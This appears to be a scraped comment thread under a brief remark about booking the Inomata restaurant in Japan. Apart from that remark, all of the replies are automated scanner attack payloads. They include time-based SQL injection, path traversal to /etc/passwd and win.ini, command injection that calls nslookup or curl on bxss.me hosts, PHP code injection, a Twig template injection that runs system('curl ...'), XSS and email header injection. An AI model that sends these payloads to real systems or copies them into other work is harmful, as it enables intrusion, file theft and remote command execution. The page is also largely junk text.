@Guest - For better or worse, Inomata seems to attract a lot of tourists. It was quite easy to get a reservation around 2 months ago, but ever since Japan opened up, it's been a different story...
re: Just_Ingest
BxXM1vgP
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+840-840-1=0+0+0+1
re: Just_Ingest
-1 OR 3+840-840-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
PNa4HHxH
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+65-65-1=0+0+0+1
re: Just_Ingest
-1 OR 3+65-65-1=0+0+0+1
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
qJxlu4ps'; waitfor delay '0:0:15' --
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
-5 OR 144=(SELECT 144 FROM PG_SLEEP(15))--
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
-5) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1)) OR 624=(SELECT 624 FROM PG_SLEEP(15))--
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
ckvvVOqh' OR 169=(SELECT 169 FROM PG_SLEEP(15))--
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
IE2faSrY') OR 227=(SELECT 227 FROM PG_SLEEP(15))--
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
OJXNjRhZ')) OR 963=(SELECT 963 FROM PG_SLEEP(15))--
re: Just_Ingest
a7spBQWc'; waitfor delay '0:0:15' --
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
-5 OR 766=(SELECT 766 FROM PG_SLEEP(15))--
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
-5) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
-1)) OR 780=(SELECT 780 FROM PG_SLEEP(15))--
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
3ZNOR13G' OR 385=(SELECT 385 FROM PG_SLEEP(15))--
re: Just_Ingest
@@zuRh8
re: Just_Ingest
uG32Sy6d') OR 808=(SELECT 808 FROM PG_SLEEP(15))--
re: Just_Ingest
r0G0zyy3')) OR 139=(SELECT 139 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@3Zjm7
re: Just_Ingest
1NzQCnQ8O
re: Just_Ingest
response.write(9671078*9205780)
re: Just_Ingest
'+response.write(9671078*9205780)+'
re: Just_Ingest
"+response.write(9671078*9205780)+"
re: Just_Ingest
%0abcc:074625.67-14582.67.c962e.19990.2@bxss.me
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-14583.67.c962e.19990.2@bxss.me
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
${9999507+9999728}
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
echo xlnjin$()\ qrroxr\nz^xyu||a #' &echo xlnjin$()\ qrroxr\nz^xyu||a #|" &echo xlnjin$()\ qrroxr\nz^xyu||a #
re: Just_Ingest
/etc/passwd
re: Just_Ingest
&echo iipbaa$()\ mxwdnf\nz^xyu||a #' &echo iipbaa$()\ mxwdnf\nz^xyu||a #|" &echo iipbaa$()\ mxwdnf\nz^xyu||a #
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
|echo tkwmfp$()\ nouqzj\nz^xyu||a #' |echo tkwmfp$()\ nouqzj\nz^xyu||a #|" |echo tkwmfp$()\ nouqzj\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
(nslookup hituvwlsqyjsb4db45.bxss.me||perl -e "gethostbyname('hituvwlsqyjsb4db45.bxss.me')")
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
)
re: Just_Ingest
$(nslookup hitdetaceisasc67d3.bxss.me||perl -e "gethostbyname('hitdetaceisasc67d3.bxss.me')")
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
&nslookup hitmqsgxagkfi04bfb.bxss.me&'\"`0&nslookup hitmqsgxagkfi04bfb.bxss.me&`'
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
&(nslookup hitpnthritsxz7fc32.bxss.me||perl -e "gethostbyname('hitpnthritsxz7fc32.bxss.me')")&'\"`0&(nslookup hitpnthritsxz7fc32.bxss.me||perl -e "gethostbyname('hitpnthritsxz7fc32.bxss.me')")&`'
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
|(nslookup hitysrbzrgcoocd44e.bxss.me||perl -e "gethostbyname('hitysrbzrgcoocd44e.bxss.me')")
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
`(nslookup hitlgharmbrqfabdbd.bxss.me||perl -e "gethostbyname('hitlgharmbrqfabdbd.bxss.me')")`
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
;(nslookup hitqjwxohvfaod911b.bxss.me||perl -e "gethostbyname('hitqjwxohvfaod911b.bxss.me')")|(nslookup hitqjwxohvfaod911b.bxss.me||perl -e "gethostbyname('hitqjwxohvfaod911b.bxss.me')")&(nslookup hitqjwxohvfaod911b.bxss.me||perl -e "gethostbyname('hitqjwxohvfaod911b.bxss.me')")
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
'.gethostbyname(lc('hitdy'.'rvuoqufs75d15.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(66).chr(112).chr(89).'
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
".gethostbyname(lc("hitpd"."tdrhtuwg0ef92.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(78).chr(118).chr(69)."
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/etc/shells
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(99).concat(71).concat(115).concat(74)+(require"socket"
Socket.gethostbyname("hitkg"+"gfbiiarga176e.bxss.me.")[3].to_s)+"
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(69).concat(99).concat(88)+(require'socket'
Socket.gethostbyname('hitxb'+'yaelvtys7c4a3.bxss.me.')[3].to_s)+'
re: Just_Ingest
bxss.me
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
'"
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
<!--
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+796-796-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+796-796-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+987-987-1=0+0+0+1
re: Just_Ingest
-1 OR 3+987-987-1=0+0+0+1
re: Just_Ingest
-1' OR 2+343-343-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+343-343-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+513-513-1=0+0+0+1 or 'WN4HwDGS'='
re: Just_Ingest
-1' OR 3+513-513-1=0+0+0+1 or 'WN4HwDGS'='
re: Just_Ingest
-1" OR 2+708-708-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+708-708-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
1aVJM2v3'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 60=(SELECT 60 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 925=(SELECT 925 FROM PG_SLEEP(15))--
re: Just_Ingest
4dRzVyKj' OR 537=(SELECT 537 FROM PG_SLEEP(15))--
re: Just_Ingest
b4NEovAl') OR 131=(SELECT 131 FROM PG_SLEEP(15))--
re: Just_Ingest
cvmqyYz1')) OR 848=(SELECT 848 FROM PG_SLEEP(15))--
re: Just_Ingest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@0ovcI
re: Just_Ingest
1I66NZKDN0
re: Just_Ingest
response.write(9456770*9649338)
re: Just_Ingest
'+response.write(9456770*9649338)+'
re: Just_Ingest
"+response.write(9456770*9649338)+"
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999913+9999944}
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../
re: Just_Ingest
)
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
redirtest.acx
re: Just_Ingest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Just_Ingest
echo unxqxb$()\ qrzwre\nz^xyu||a #' &echo unxqxb$()\ qrzwre\nz^xyu||a #|" &echo unxqxb$()\ qrzwre\nz^xyu||a #
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Just_Ingest
&echo sdrojh$()\ wmunos\nz^xyu||a #' &echo sdrojh$()\ wmunos\nz^xyu||a #|" &echo sdrojh$()\ wmunos\nz^xyu||a #
re: Just_Ingest
'.gethostbyname(lc('hitnt'.'iiuuxjle88bb7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(81).chr(109).chr(73).'
re: Just_Ingest
/etc/shells
re: Just_Ingest
|echo zntdss$()\ txaium\nz^xyu||a #' |echo zntdss$()\ txaium\nz^xyu||a #|" |echo zntdss$()\ txaium\nz^xyu||a #
re: Just_Ingest
".gethostbyname(lc("hitfm"."ioszcohc717c0.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(79).chr(121).chr(77)."
re: Just_Ingest
../../../../../../../../../../../../../../etc/shells
re: Just_Ingest
expr 9000369319 - 968322
re: Just_Ingest
gethostbyname(lc('hitdr'.'matkyyiha0b12.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(73).chr(112).chr(65)
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
(nslookup -q=cname hittnolofldor97abe.bxss.me||curl hittnolofldor97abe.bxss.me))
re: Just_Ingest
bxss.me
re: Just_Ingest
$(nslookup -q=cname hitzypwssyqpg308ca.bxss.me||curl hitzypwssyqpg308ca.bxss.me)
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
&nslookup -q=cname hitbldybesmlza35ec.bxss.me&'\"`0&nslookup -q=cname hitbldybesmlza35ec.bxss.me&`'
re: Just_Ingest
http://bxss.me/t/fit.txt?.jpg
re: Just_Ingest
&(nslookup -q=cname hitsrhanzxcqc78171.bxss.me||curl hitsrhanzxcqc78171.bxss.me)&'\"`0&(nslookup -q=cname hitsrhanzxcqc78171.bxss.me||curl hitsrhanzxcqc78171.bxss.me)&`'
re: Just_Ingest
|(nslookup -q=cname hittopeqxzpin8b506.bxss.me||curl hittopeqxzpin8b506.bxss.me)
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
`(nslookup -q=cname hitulfazpigkxbce37.bxss.me||curl hitulfazpigkxbce37.bxss.me)`
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
;(nslookup -q=cname hithnfqpdcqbp20625.bxss.me||curl hithnfqpdcqbp20625.bxss.me)|(nslookup -q=cname hithnfqpdcqbp20625.bxss.me||curl hithnfqpdcqbp20625.bxss.me)&(nslookup -q=cname hithnfqpdcqbp20625.bxss.me||curl hithnfqpdcqbp20625.bxss.me)
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
|(nslookup${IFS}-q${IFS}cname${IFS}hitbsjfrkrimv589e5.bxss.me||curl${IFS}hitbsjfrkrimv589e5.bxss.me)
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
&(nslookup${IFS}-q${IFS}cname${IFS}hitsuthxrdgsdfb0d3.bxss.me||curl${IFS}hitsuthxrdgsdfb0d3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsuthxrdgsdfb0d3.bxss.me||curl${IFS}hitsuthxrdgsdfb0d3.bxss.me)&`'
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(117).concat(71).concat(105).concat(74)+(require"socket"
Socket.gethostbyname("hitfb"+"jtoofvle0ea42.bxss.me.")[3].to_s)+"
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(112).concat(80).concat(111).concat(70)+(require'socket'
Socket.gethostbyname('hitlb'+'nsvsqwxy7c846.bxss.me.')[3].to_s)+'
re: Just_Ingest
'A'.concat(70-3).concat(22*4).concat(107).concat(71).concat(113).concat(86)+(require'socket'
Socket.gethostbyname('hitir'+'zmrulccb39845.bxss.me.')[3].to_s)
re: Just_Ingest
'"()
re: Just_Ingest
'&&sleep(27*1000)*lzlbra&&'
re: Just_Ingest
"&&sleep(27*1000)*rdnmet&&"
re: Just_Ingest
'||sleep(27*1000)*cathsh||'
re: Just_Ingest
'"
re: Just_Ingest
replies
re: Just_Ingest
"||sleep(27*1000)*ezsgra||"
re: Just_Ingest
<!--
re: Just_Ingest
replies�
re: Just_Ingest
replies/.
re: Just_Ingest
'"()&%<zzz><ScRiPt >hVtR(9153)</ScRiPt>
re: Just_Ingest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvdxohtyvqd7cfc1.bxss.me")}}
re: Just_Ingest
'"()&%<zzz><ScRiPt >hVtR(9930)</ScRiPt>
re: Just_Ingest
9991419
re: Just_Ingest
JHgHXnFf
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
-1 OR 5*5=25 --
re: Just_Ingest
-1 OR 5*5=26 --
re: Just_Ingest
-1 OR 5*5=25
re: Just_Ingest
-1 OR 5*5=26
re: Just_Ingest
*if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
